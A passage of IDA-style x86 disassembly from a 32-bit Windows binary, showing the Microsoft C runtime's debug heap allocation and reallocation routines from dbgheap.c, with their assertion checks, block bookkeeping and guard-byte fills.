mov eax, [ebp+var_8]
mov dword ptr [eax+0Ch], 0
mov eax, [ebp+var_4]
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
sub_41BD80 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41BE40 proc near ; CODE XREF: sub_4010AA+6�p
; sub_40ADC9+63�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push 0
push 0
push 1
mov eax, ds:dword_4F3374
push eax
mov ecx, [ebp+arg_0]
push ecx
call sub_41BEC0
add esp, 14h
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
mov esp, ebp
pop ebp
retn
sub_41BE40 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41BE70 proc near ; CODE XREF: sub_41C2D0+20�p
; sub_41C3F0+26�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push ecx
mov eax, [ebp+arg_C]
push eax
mov ecx, [ebp+arg_8]
push ecx
mov edx, [ebp+arg_4]
push edx
mov eax, ds:dword_4F3374
push eax
mov ecx, [ebp+arg_0]
push ecx
call sub_41BEC0
add esp, 14h
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
mov esp, ebp
pop ebp
retn
sub_41BE70 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41BEA0 proc near ; CODE XREF: sub_420C30+A�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push 0
push 0
push 1
mov eax, [ebp+arg_4]
push eax
mov ecx, [ebp+arg_0]
push ecx
call sub_41BEC0
add esp, 14h
pop ebp
retn
sub_41BEA0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41BEC0 proc near ; CODE XREF: sub_41BE40+14�p
; sub_41BE70+1A�p ...
var_1C = dword ptr -1Ch
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
; FUNCTION CHUNK AT 0041BF28 SIZE 00000038 BYTES
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_43C548
push offset sub_423364
mov eax, large fs:0
push eax
mov large fs:0, esp
add esp, 0FFFFFFF4h
push ebx
push esi
push edi
loc_41BEE3: ; CODE XREF: sub_41BEC0:loc_41BF4D�j
push 9
call sub_423280
add esp, 4
mov [ebp+var_4], 0
mov eax, [ebp+arg_10]
push eax
mov ecx, [ebp+arg_C]
push ecx
mov edx, [ebp+arg_8]
push edx
mov eax, [ebp+arg_0]
push eax
call sub_41BF80
add esp, 10h
mov [ebp+var_1C], eax
mov [ebp+var_4], 0FFFFFFFFh
call sub_41BF1D
jmp short loc_41BF28
sub_41BEC0 endp
; =============== S U B R O U T I N E =======================================
sub_41BF1D proc near ; CODE XREF: sub_41BEC0+56�p
; DATA XREF: _1:0043C550�o
push 9
call sub_423320
add esp, 4
retn
sub_41BF1D endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_41BEC0
loc_41BF28: ; CODE XREF: sub_41BEC0+5B�j
cmp [ebp+var_1C], 0
jnz short loc_41BF34
cmp [ebp+arg_4], 0
jnz short loc_41BF39
loc_41BF34: ; CODE XREF: sub_41BEC0+6C�j
mov eax, [ebp+var_1C]
jmp short loc_41BF4F
; ---------------------------------------------------------------------------
loc_41BF39: ; CODE XREF: sub_41BEC0+72�j
mov ecx, [ebp+arg_0]
push ecx
call sub_423170
add esp, 4
test eax, eax
jnz short loc_41BF4D
xor eax, eax
jmp short loc_41BF4F
; ---------------------------------------------------------------------------
loc_41BF4D: ; CODE XREF: sub_41BEC0+87�j
jmp short loc_41BEE3
; ---------------------------------------------------------------------------
loc_41BF4F: ; CODE XREF: sub_41BEC0+77�j
; sub_41BEC0+8B�j
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
; END OF FUNCTION CHUNK FOR sub_41BEC0
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
push 0
push 0
push 1
mov eax, [ebp+8]
push eax
call sub_41BF80
add esp, 10h
pop ebp
retn
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41BF80 proc near ; CODE XREF: sub_41BEC0+44�p
; _0:0041BF6D�p
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 10h
push ebx
push esi
push edi
mov [ebp+var_C], 0
mov eax, ds:dword_4517E0
and eax, 4
test eax, eax
jz short loc_41BFCC
loc_41BF9C: ; CODE XREF: sub_41BF80+4A�j
call sub_41D1D0
test eax, eax
jnz short loc_41BFC6
push offset a_crtcheckmemor ; "_CrtCheckMemory()"
push 0
push 14Ch
push offset aDbgheap_c ; "dbgheap.c"
push 2
call sub_422610
add esp, 14h
cmp eax, 1
jnz short loc_41BFC6
int 3 ; Trap to Debugger
loc_41BFC6: ; CODE XREF: sub_41BF80+23�j
; sub_41BF80+43�j
xor ecx, ecx
test ecx, ecx
jnz short loc_41BF9C
loc_41BFCC: ; CODE XREF: sub_41BF80+1A�j
mov edx, ds:dword_4517E4
mov [ebp+var_8], edx
mov eax, [ebp+var_8]
cmp eax, ds:dword_4517E8
jnz short loc_41BFE1
int 3 ; Trap to Debugger
loc_41BFE1: ; CODE XREF: sub_41BF80+5E�j
mov ecx, [ebp+arg_C]
push ecx
mov edx, [ebp+arg_8]
push edx
mov eax, [ebp+var_8]
push eax
mov ecx, [ebp+arg_4]
push ecx
mov edx, [ebp+arg_0]
push edx
push 0
push 1
call ds:off_451BB0
add esp, 1Ch
test eax, eax
jnz short loc_41C064
cmp [ebp+arg_8], 0
jz short loc_41C037
loc_41C00C: ; CODE XREF: sub_41BF80+B3�j
mov eax, [ebp+arg_C]
push eax
mov ecx, [ebp+arg_8]
push ecx
push offset aClientHookAllo ; "Client hook allocation failure at file "...
push 0
push 0
push 0
push 0
call sub_422610
add esp, 1Ch
cmp eax, 1
jnz short loc_41C02F
int 3 ; Trap to Debugger
loc_41C02F: ; CODE XREF: sub_41BF80+AC�j
xor edx, edx
test edx, edx
jnz short loc_41C00C
jmp short loc_41C05D
; ---------------------------------------------------------------------------
loc_41C037: ; CODE XREF: sub_41BF80+8A�j
; sub_41BF80+DB�j
push offset aClientHookAl_0 ; "Client hook allocation failure.\n"
push offset aS_19 ; "%s"
push 0
push 0
push 0
push 0
call sub_422610
add esp, 18h
cmp eax, 1
jnz short loc_41C057
int 3 ; Trap to Debugger
loc_41C057: ; CODE XREF: sub_41BF80+D4�j
xor eax, eax
test eax, eax
jnz short loc_41C037
loc_41C05D: ; CODE XREF: sub_41BF80+B5�j
xor eax, eax
jmp loc_41C28C
; ---------------------------------------------------------------------------
loc_41C064: ; CODE XREF: sub_41BF80+84�j
mov ecx, [ebp+arg_4]
and ecx, 0FFFFh
cmp ecx, 2
jz short loc_41C086
mov edx, ds:dword_4517E0
and edx, 1
test edx, edx
jnz short loc_41C086
mov [ebp+var_C], 1
loc_41C086: ; CODE XREF: sub_41BF80+F0�j
; sub_41BF80+FD�j
cmp [ebp+arg_0], 0FFFFFFE0h
ja short loc_41C097
mov eax, [ebp+arg_0]
add eax, 24h
cmp eax, 0FFFFFFE0h
jbe short loc_41C0C3
loc_41C097: ; CODE XREF: sub_41BF80+10A�j
; sub_41BF80+13A�j
mov ecx, [ebp+arg_0]
push ecx
push offset aInvalidAllocat ; "Invalid allocation size: %u bytes.\n"
push 0
push 0
push 0
push 1
call sub_422610
add esp, 18h
cmp eax, 1
jnz short loc_41C0B6
int 3 ; Trap to Debugger
loc_41C0B6: ; CODE XREF: sub_41BF80+133�j
xor edx, edx
test edx, edx
jnz short loc_41C097
xor eax, eax
jmp loc_41C28C
; ---------------------------------------------------------------------------
loc_41C0C3: ; CODE XREF: sub_41BF80+115�j
mov eax, [ebp+arg_4]
and eax, 0FFFFh
cmp eax, 4
jz short loc_41C110
cmp [ebp+arg_4], 1
jz short loc_41C110
mov ecx, [ebp+arg_4]
and ecx, 0FFFFh
cmp ecx, 2
jz short loc_41C110
cmp [ebp+arg_4], 3
jz short loc_41C110
loc_41C0EA: ; CODE XREF: sub_41BF80+18E�j
push offset aErrorMemoryAll ; "Error: memory allocation: bad memory bl"...
push offset aS_19 ; "%s"
push 0
push 0
push 0
push 1
call sub_422610
add esp, 18h
cmp eax, 1
jnz short loc_41C10A
int 3 ; Trap to Debugger
loc_41C10A: ; CODE XREF: sub_41BF80+187�j
xor edx, edx
test edx, edx
jnz short loc_41C0EA
loc_41C110: ; CODE XREF: sub_41BF80+14E�j
; sub_41BF80+154�j ...
mov eax, [ebp+arg_0]
add eax, 24h
mov [ebp+var_10], eax
mov ecx, [ebp+var_10]
push ecx
call sub_4234C0
add esp, 4
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jnz short loc_41C135
xor eax, eax
jmp loc_41C28C
; ---------------------------------------------------------------------------
loc_41C135: ; CODE XREF: sub_41BF80+1AC�j
mov edx, ds:dword_4517E4
add edx, 1
mov ds:dword_4517E4, edx
cmp [ebp+var_C], 0
jz short loc_41C193
mov eax, [ebp+var_4]
mov dword ptr [eax], 0
mov ecx, [ebp+var_4]
mov dword ptr [ecx+4], 0
mov edx, [ebp+var_4]
mov dword ptr [edx+8], 0
mov eax, [ebp+var_4]
mov dword ptr [eax+0Ch], 0FEDCBABCh
mov ecx, [ebp+var_4]
mov edx, [ebp+arg_0]
mov [ecx+10h], edx
mov eax, [ebp+var_4]
mov dword ptr [eax+14h], 3
mov ecx, [ebp+var_4]
mov dword ptr [ecx+18h], 0
jmp loc_41C233
; ---------------------------------------------------------------------------
loc_41C193: ; CODE XREF: sub_41BF80+1C8�j
mov edx, ds:dword_4F32E4
add edx, [ebp+arg_0]
mov ds:dword_4F32E4, edx
mov eax, ds:dword_4F32EC
add eax, [ebp+arg_0]
mov ds:dword_4F32EC, eax
mov ecx, ds:dword_4F32EC
cmp ecx, ds:dword_4F32F0
jbe short loc_41C1C9
mov edx, ds:dword_4F32EC
mov ds:dword_4F32F0, edx
loc_41C1C9: ; CODE XREF: sub_41BF80+23B�j
cmp ds:dword_4F32E8, 0
jz short loc_41C1DF
mov eax, ds:dword_4F32E8
mov ecx, [ebp+var_4]
mov [eax+4], ecx
jmp short loc_41C1E8
; ---------------------------------------------------------------------------
loc_41C1DF: ; CODE XREF: sub_41BF80+250�j
mov edx, [ebp+var_4]
mov ds:dword_4F32E0, edx
loc_41C1E8: ; CODE XREF: sub_41BF80+25D�j
mov eax, [ebp+var_4]
mov ecx, ds:dword_4F32E8
mov [eax], ecx
mov edx, [ebp+var_4]
mov dword ptr [edx+4], 0
mov eax, [ebp+var_4]
mov ecx, [ebp+arg_8]
mov [eax+8], ecx
mov edx, [ebp+var_4]
mov eax, [ebp+arg_C]
mov [edx+0Ch], eax
mov ecx, [ebp+var_4]
mov edx, [ebp+arg_0]
mov [ecx+10h], edx
mov eax, [ebp+var_4]
mov ecx, [ebp+arg_4]
mov [eax+14h], ecx
mov edx, [ebp+var_4]
mov eax, [ebp+var_8]
mov [edx+18h], eax
mov ecx, [ebp+var_4]
mov ds:dword_4F32E8, ecx
loc_41C233: ; CODE XREF: sub_41BF80+20E�j
push 4
xor edx, edx
mov dl, ds:byte_4517EC
push edx
mov eax, [ebp+var_4]
add eax, 1Ch
push eax
call sub_41E4B0
add esp, 0Ch
push 4
xor ecx, ecx
mov cl, ds:byte_4517EC
push ecx
mov edx, [ebp+arg_0]
mov eax, [ebp+var_4]
lea ecx, [eax+edx+20h]
push ecx
call sub_41E4B0
add esp, 0Ch
mov edx, [ebp+arg_0]
push edx
xor eax, eax
mov al, ds:byte_4517EE
push eax
mov ecx, [ebp+var_4]
add ecx, 20h
push ecx
call sub_41E4B0
add esp, 0Ch
mov eax, [ebp+var_4]
add eax, 20h
loc_41C28C: ; CODE XREF: sub_41BF80+DF�j
; sub_41BF80+13E�j ...
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
sub_41BF80 endp
; ---------------------------------------------------------------------------
align 10h
push ebp
mov ebp, esp
push ecx
push 0
push 0
push 1
mov eax, [ebp+0Ch]
push eax
mov ecx, [ebp+8]
push ecx
call sub_41C2D0
add esp, 14h
mov [ebp-4], eax
mov eax, [ebp-4]
mov esp, ebp
pop ebp
retn
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41C2D0 proc near ; CODE XREF: _0:0041C2B2�p
; sub_4222D0+40�p ...
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
sub esp, 0Ch
mov eax, [ebp+arg_4]
imul eax, [ebp+arg_0]
mov [ebp+arg_4], eax
mov ecx, [ebp+arg_10]
push ecx
mov edx, [ebp+arg_C]
push edx
mov eax, [ebp+arg_8]
push eax
mov ecx, [ebp+arg_4]
push ecx
call sub_41BE70
add esp, 10h
mov [ebp+var_8], eax
cmp [ebp+var_8], 0
jz short loc_41C329
mov edx, [ebp+var_8]
mov [ebp+var_C], edx
mov eax, [ebp+var_C]
add eax, [ebp+arg_4]
mov [ebp+var_4], eax
loc_41C310: ; CODE XREF: sub_41C2D0+57�j
mov ecx, [ebp+var_C]
cmp ecx, [ebp+var_4]
jnb short loc_41C329
mov edx, [ebp+var_C]
mov byte ptr [edx], 0
mov eax, [ebp+var_C]
add eax, 1
mov [ebp+var_C], eax
jmp short loc_41C310
; ---------------------------------------------------------------------------
loc_41C329: ; CODE XREF: sub_41C2D0+2F�j
; sub_41C2D0+46�j
mov eax, [ebp+var_8]
mov esp, ebp
pop ebp
retn
sub_41C2D0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41C330 proc near ; CODE XREF: sub_4010AA+2C�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push 0
push 0
push 1
mov eax, [ebp+arg_4]
push eax
mov ecx, [ebp+arg_0]
push ecx
call sub_41C360
add esp, 14h
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
mov esp, ebp
pop ebp
retn
sub_41C330 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41C360 proc near ; CODE XREF: sub_41C330+12�p
; sub_420C50+50�p ...
var_1C = dword ptr -1Ch
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
; FUNCTION CHUNK AT 0041C3CE SIZE 00000014 BYTES
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_43C630
push offset sub_423364
mov eax, large fs:0
push eax
mov large fs:0, esp
add esp, 0FFFFFFF4h
push ebx
push esi
push edi
push 9
call sub_423280
add esp, 4
mov [ebp+var_4], 0
push 1
mov eax, [ebp+arg_10]
push eax
mov ecx, [ebp+arg_C]
push ecx
mov edx, [ebp+arg_8]
push edx
mov eax, [ebp+arg_4]
push eax
mov ecx, [ebp+arg_0]
push ecx
call sub_41C3F0
add esp, 18h
mov [ebp+var_1C], eax
mov [ebp+var_4], 0FFFFFFFFh
call sub_41C3C3
jmp short loc_41C3CE
sub_41C360 endp
; =============== S U B R O U T I N E =======================================
sub_41C3C3 proc near ; CODE XREF: sub_41C360+5C�p
push 9
call sub_423320
add esp, 4
retn
sub_41C3C3 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_41C360
loc_41C3CE: ; CODE XREF: sub_41C360+61�j
mov eax, [ebp+var_1C]
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
; END OF FUNCTION CHUNK FOR sub_41C360
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41C3F0 proc near ; CODE XREF: sub_41C360+4A�p
; sub_41C940+4A�p
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
push ebp
mov ebp, esp
sub esp, 14h
push ebx
push esi
push edi
mov [ebp+var_14], 0
cmp [ebp+arg_0], 0
jnz short loc_41C423
mov eax, [ebp+arg_10]
push eax
mov ecx, [ebp+arg_C]
push ecx
mov edx, [ebp+arg_8]
push edx
mov eax, [ebp+arg_4]
push eax
call sub_41BE70
add esp, 10h
jmp loc_41C8FA
; ---------------------------------------------------------------------------
loc_41C423: ; CODE XREF: sub_41C3F0+14�j
cmp [ebp+arg_14], 0
jz short loc_41C446
cmp [ebp+arg_4], 0
jnz short loc_41C446
mov ecx, [ebp+arg_8]
push ecx
mov edx, [ebp+arg_0]
push edx
call sub_41CA10
add esp, 8
xor eax, eax
jmp loc_41C8FA
; ---------------------------------------------------------------------------
loc_41C446: ; CODE XREF: sub_41C3F0+37�j
; sub_41C3F0+3D�j
mov eax, ds:dword_4517E0
and eax, 4
test eax, eax
jz short loc_41C482
loc_41C452: ; CODE XREF: sub_41C3F0+90�j
call sub_41D1D0
test eax, eax
jnz short loc_41C47C
push offset a_crtcheckmemor ; "_CrtCheckMemory()"
push 0
push 246h
push offset aDbgheap_c ; "dbgheap.c"
push 2
call sub_422610
add esp, 14h
cmp eax, 1
jnz short loc_41C47C
int 3 ; Trap to Debugger
loc_41C47C: ; CODE XREF: sub_41C3F0+69�j
; sub_41C3F0+89�j
xor ecx, ecx
test ecx, ecx
jnz short loc_41C452
loc_41C482: ; CODE XREF: sub_41C3F0+60�j
mov edx, ds:dword_4517E4
mov [ebp+var_10], edx
mov eax, [ebp+var_10]
cmp eax, ds:dword_4517E8
jnz short loc_41C497
int 3 ; Trap to Debugger
loc_41C497: ; CODE XREF: sub_41C3F0+A4�j
mov ecx, [ebp+arg_10]
push ecx
mov edx, [ebp+arg_C]
push edx
mov eax, [ebp+var_10]
push eax
mov ecx, [ebp+arg_8]
push ecx
mov edx, [ebp+arg_4]
push edx
mov eax, [ebp+arg_0]
push eax
push 2
call ds:off_451BB0
add esp, 1Ch
test eax, eax
jnz short loc_41C51C
cmp [ebp+arg_C], 0
jz short loc_41C4EF
loc_41C4C4: ; CODE XREF: sub_41C3F0+FB�j
mov ecx, [ebp+arg_10]
push ecx
mov edx, [ebp+arg_C]
push edx
push offset aClientHookReAl ; "Client hook re-allocation failure at fi"...
push 0
push 0
push 0
push 0
call sub_422610
add esp, 1Ch
cmp eax, 1
jnz short loc_41C4E7
int 3 ; Trap to Debugger
loc_41C4E7: ; CODE XREF: sub_41C3F0+F4�j
xor eax, eax
test eax, eax
jnz short loc_41C4C4
jmp short loc_41C515
; ---------------------------------------------------------------------------
loc_41C4EF: ; CODE XREF: sub_41C3F0+D2�j
; sub_41C3F0+123�j
push offset aClientHookRe_0 ; "Client hook re-allocation failure.\n"
push offset aS_19 ; "%s"
push 0
push 0
push 0
push 0
call sub_422610
add esp, 18h
cmp eax, 1
jnz short loc_41C50F
int 3 ; Trap to Debugger
loc_41C50F: ; CODE XREF: sub_41C3F0+11C�j
xor ecx, ecx
test ecx, ecx
jnz short loc_41C4EF
loc_41C515: ; CODE XREF: sub_41C3F0+FD�j
xor eax, eax
jmp loc_41C8FA
; ---------------------------------------------------------------------------
loc_41C51C: ; CODE XREF: sub_41C3F0+CC�j
cmp [ebp+arg_4], 0FFFFFFDBh
jbe short loc_41C54E
loc_41C522: ; CODE XREF: sub_41C3F0+155�j
mov edx, [ebp+arg_4]
push edx
push offset aAllocationTooL ; "Allocation too large or negative: %u by"...
push 0
push 0
push 0
push 1
call sub_422610
add esp, 18h
cmp eax, 1
jnz short loc_41C541
int 3 ; Trap to Debugger
loc_41C541: ; CODE XREF: sub_41C3F0+14E�j
xor eax, eax
test eax, eax
jnz short loc_41C522
xor eax, eax
jmp loc_41C8FA
; ---------------------------------------------------------------------------
loc_41C54E: ; CODE XREF: sub_41C3F0+130�j
cmp [ebp+arg_8], 1
jz short loc_41C596
mov ecx, [ebp+arg_8]
and ecx, 0FFFFh
cmp ecx, 4
jz short loc_41C596
mov edx, [ebp+arg_8]
and edx, 0FFFFh
cmp edx, 2
jz short loc_41C596
loc_41C570: ; CODE XREF: sub_41C3F0+1A4�j
push offset aErrorMemoryAll ; "Error: memory allocation: bad memory bl"...
push offset aS_19 ; "%s"
push 0
push 0
push 0
push 1
call sub_422610
add esp, 18h
cmp eax, 1
jnz short loc_41C590
int 3 ; Trap to Debugger
loc_41C590: ; CODE XREF: sub_41C3F0+19D�j
xor eax, eax
test eax, eax
jnz short loc_41C570
loc_41C596: ; CODE XREF: sub_41C3F0+162�j
; sub_41C3F0+170�j ...
mov ecx, [ebp+arg_0]
push ecx
call sub_41D6B0
add esp, 4
test eax, eax
jnz short loc_41C5C7
push offset a_crtisvalidhea ; "_CrtIsValidHeapPointer(pUserData)"
push 0
push 26Eh
push offset aDbgheap_c ; "dbgheap.c"
push 2
call sub_422610
add esp, 14h
cmp eax, 1
jnz short loc_41C5C7
int 3 ; Trap to Debugger
loc_41C5C7: ; CODE XREF: sub_41C3F0+1B4�j
; sub_41C3F0+1D4�j
xor edx, edx
test edx, edx
jnz short loc_41C596
mov eax, [ebp+arg_0]
sub eax, 20h
mov [ebp+var_8], eax
mov ecx, [ebp+var_8]
cmp dword ptr [ecx+14h], 3
jnz short loc_41C5E6
mov [ebp+var_14], 1
loc_41C5E6: ; CODE XREF: sub_41C3F0+1ED�j
cmp [ebp+var_14], 0
jz short loc_41C62A
loc_41C5EC: ; CODE XREF: sub_41C3F0+236�j
mov edx, [ebp+var_8]
cmp dword ptr [edx+0Ch], 0FEDCBABCh
jnz short loc_41C601
mov eax, [ebp+var_8]
cmp dword ptr [eax+18h], 0
jz short loc_41C622
loc_41C601: ; CODE XREF: sub_41C3F0+206�j
push offset aPoldblockNline ; "pOldBlock->nLine == IGNORE_LINE && pOld"...
push 0
push 278h
push offset aDbgheap_c ; "dbgheap.c"
push 2
call sub_422610
add esp, 14h
cmp eax, 1
jnz short loc_41C622
int 3 ; Trap to Debugger
loc_41C622: ; CODE XREF: sub_41C3F0+20F�j
; sub_41C3F0+22F�j
xor ecx, ecx
test ecx, ecx
jnz short loc_41C5EC
jmp short loc_41C68E
; ---------------------------------------------------------------------------
loc_41C62A: ; CODE XREF: sub_41C3F0+1FA�j
mov edx, [ebp+var_8]
mov eax, [edx+14h]
and eax, 0FFFFh
cmp eax, 2
jnz short loc_41C64F
mov ecx, [ebp+arg_8]
and ecx, 0FFFFh
cmp ecx, 1
jnz short loc_41C64F
mov [ebp+arg_8], 2
loc_41C64F: ; CODE XREF: sub_41C3F0+248�j
; sub_41C3F0+256�j ...
mov edx, [ebp+var_8]
mov eax, [edx+14h]
and eax, 0FFFFh
mov ecx, [ebp+arg_8]
and ecx, 0FFFFh
cmp eax, ecx
jz short loc_41C688
push offset a_block_typePol ; "_BLOCK_TYPE(pOldBlock->nBlockUse)==_BLO"...
push 0
push 27Fh
push offset aDbgheap_c ; "dbgheap.c"
push 2
call sub_422610
add esp, 14h
cmp eax, 1
jnz short loc_41C688
int 3 ; Trap to Debugger
loc_41C688: ; CODE XREF: sub_41C3F0+275�j
; sub_41C3F0+295�j
xor edx, edx
test edx, edx
jnz short loc_41C64F
loc_41C68E: ; CODE XREF: sub_41C3F0+238�j
cmp [ebp+arg_14], 0
jz short loc_41C6B9
mov eax, [ebp+arg_4]
add eax, 24h
push eax
mov ecx, [ebp+var_8]
push ecx
call sub_423830
add esp, 8
mov [ebp+var_C], eax
cmp [ebp+var_C], 0
jnz short loc_41C6B7
xor eax, eax
jmp loc_41C8FA
; ---------------------------------------------------------------------------
loc_41C6B7: ; CODE XREF: sub_41C3F0+2BE�j
jmp short loc_41C6DC
; ---------------------------------------------------------------------------
loc_41C6B9: ; CODE XREF: sub_41C3F0+2A2�j
mov edx, [ebp+arg_4]
add edx, 24h
push edx
mov eax, [ebp+var_8]
push eax
call sub_423620
add esp, 8
mov [ebp+var_C], eax
cmp [ebp+var_C], 0
jnz short loc_41C6DC
xor eax, eax
jmp loc_41C8FA
; ---------------------------------------------------------------------------
loc_41C6DC: ; CODE XREF: sub_41C3F0:loc_41C6B7�j
; sub_41C3F0+2E3�j
mov ecx, ds:dword_4517E4
add ecx, 1
mov ds:dword_4517E4, ecx
cmp [ebp+var_14], 0
jnz short loc_41C747
mov edx, [ebp+var_C]
mov eax, ds:dword_4F32E4
sub eax, [edx+10h]
mov ds:dword_4F32E4, eax
mov ecx, ds:dword_4F32E4
add ecx, [ebp+arg_4]
mov ds:dword_4F32E4, ecx
mov edx, [ebp+var_C]
mov eax, ds:dword_4F32EC
sub eax, [edx+10h]
mov ds:dword_4F32EC, eax
mov ecx, ds:dword_4F32EC
add ecx, [ebp+arg_4]
mov ds:dword_4F32EC, ecx
mov edx, ds:dword_4F32EC
cmp edx, ds:dword_4F32F0
jbe short loc_41C747
mov eax, ds:dword_4F32EC
mov ds:dword_4F32F0, eax
loc_41C747: ; CODE XREF: sub_41C3F0+2FF�j
; sub_41C3F0+34B�j
mov ecx, [ebp+var_C]
add ecx, 20h
mov [ebp+var_4], ecx
mov edx, [ebp+var_C]
mov eax, [ebp+arg_4]
cmp eax, [edx+10h]
jbe short loc_41C77F
mov ecx, [ebp+var_C]
mov edx, [ebp+arg_4]
sub edx, [ecx+10h]
push edx
xor eax, eax
mov al, ds:byte_4517EE
push eax
mov ecx, [ebp+var_C]
mov edx, [ebp+var_4]
add edx, [ecx+10h]
push edx
call sub_41E4B0
add esp, 0Ch
loc_41C77F: ; CODE XREF: sub_41C3F0+369�j
push 4
xor eax, eax
mov al, ds:byte_4517EC
push eax
mov ecx, [ebp+var_4]
add ecx, [ebp+arg_4]
push ecx
call sub_41E4B0
add esp, 0Ch
cmp [ebp+var_14], 0
jnz short loc_41C7B9
mov edx, [ebp+var_C]
mov eax, [ebp+arg_C]
mov [edx+8], eax
mov ecx, [ebp+var_C]
mov edx, [ebp+arg_10]
mov [ecx+0Ch], edx
mov eax, [ebp+var_C]
mov ecx, [ebp+var_10]
mov [eax+18h], ecx
loc_41C7B9: ; CODE XREF: sub_41C3F0+3AC�j
mov edx, [ebp+var_C]
mov eax, [ebp+arg_4]
mov [edx+10h], eax
loc_41C7C2: ; CODE XREF: sub_41C3F0+40B�j
cmp [ebp+arg_14], 0
jnz short loc_41C7F7
cmp [ebp+arg_14], 0
jnz short loc_41C7D6
mov ecx, [ebp+var_C]
cmp ecx, [ebp+var_8]
jz short loc_41C7F7
loc_41C7D6: ; CODE XREF: sub_41C3F0+3DC�j
push offset aFreallocFreall ; "fRealloc || (!fRealloc && pNewBlock == "...
push 0
push 2B5h
push offset aDbgheap_c ; "dbgheap.c"
push 2
call sub_422610
add esp, 14h
cmp eax, 1
jnz short loc_41C7F7
int 3 ; Trap to Debugger
loc_41C7F7: ; CODE XREF: sub_41C3F0+3D6�j
; sub_41C3F0+3E4�j ...
xor edx, edx
test edx, edx
jnz short loc_41C7C2
mov eax, [ebp+var_C]
cmp eax, [ebp+var_8]
jz short loc_41C80B
cmp [ebp+var_14], 0
jz short loc_41C813
loc_41C80B: ; CODE XREF: sub_41C3F0+413�j
mov eax, [ebp+var_4]
jmp loc_41C8FA
; ---------------------------------------------------------------------------
loc_41C813: ; CODE XREF: sub_41C3F0+419�j
mov ecx, [ebp+var_C]
cmp dword ptr [ecx], 0
jz short loc_41C82B
mov edx, [ebp+var_C]
mov eax, [edx]
mov ecx, [ebp+var_C]
mov edx, [ecx+4]
mov [eax+4], edx
jmp short loc_41C867
; ---------------------------------------------------------------------------
loc_41C82B: ; CODE XREF: sub_41C3F0+429�j
; sub_41C3F0+46A�j
mov eax, ds:dword_4F32E0
cmp eax, [ebp+var_8]
jz short loc_41C856
push offset a_plastblockPol ; "_pLastBlock == pOldBlock"
push 0
push 2C4h
push offset aDbgheap_c ; "dbgheap.c"
push 2
call sub_422610
add esp, 14h
cmp eax, 1
jnz short loc_41C856
int 3 ; Trap to Debugger
loc_41C856: ; CODE XREF: sub_41C3F0+443�j
; sub_41C3F0+463�j
xor ecx, ecx
test ecx, ecx
jnz short loc_41C82B
mov edx, [ebp+var_C]
mov eax, [edx+4]
mov ds:dword_4F32E0, eax
loc_41C867: ; CODE XREF: sub_41C3F0+439�j
mov ecx, [ebp+var_C]
cmp dword ptr [ecx+4], 0
jz short loc_41C87F
mov edx, [ebp+var_C]
mov eax, [edx+4]
mov ecx, [ebp+var_C]
mov edx, [ecx]
mov [eax], edx
jmp short loc_41C8BA
; ---------------------------------------------------------------------------
loc_41C87F: ; CODE XREF: sub_41C3F0+47E�j
; sub_41C3F0+4BE�j
mov eax, ds:dword_4F32E8
cmp eax, [ebp+var_8]
